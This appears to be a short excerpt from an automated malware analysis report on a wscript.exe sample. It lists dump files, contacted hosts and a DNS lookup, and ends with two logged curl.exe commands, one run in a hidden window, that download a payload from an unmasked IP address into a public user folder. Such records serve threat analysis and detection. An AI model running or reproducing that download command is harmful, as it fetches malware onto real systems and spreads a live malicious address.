Technical Information
- %TEMP%\content\2060-1104-wscript.exe-19-50-22-832.dump
- %TEMP%\content\2060-1104-wscript.exe-19-50-22-875.dump
- %TEMP%\content\2060-1104-wscript.exe-19-50-39-197.dump
- 'co####erhope.com':443
- '15#.#55.213.54':80
- http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?1b##############
- http://15#.#55.213.54/vMCtB/DB507
- 'co####erhope.com':443
- DNS ASK co####erhope.com
- ClassName: 'OleMainThreadWndClass' WindowName: ''
- '<SYSTEM32>\curl.exe' -o c:\users\public\busker.tmp http://158.255.213.54/vMCtB/DB507' (with hidden window)
- '<SYSTEM32>\curl.exe' -o c:\users\public\busker.tmp http://158.255.213.54/vMCtB/DB507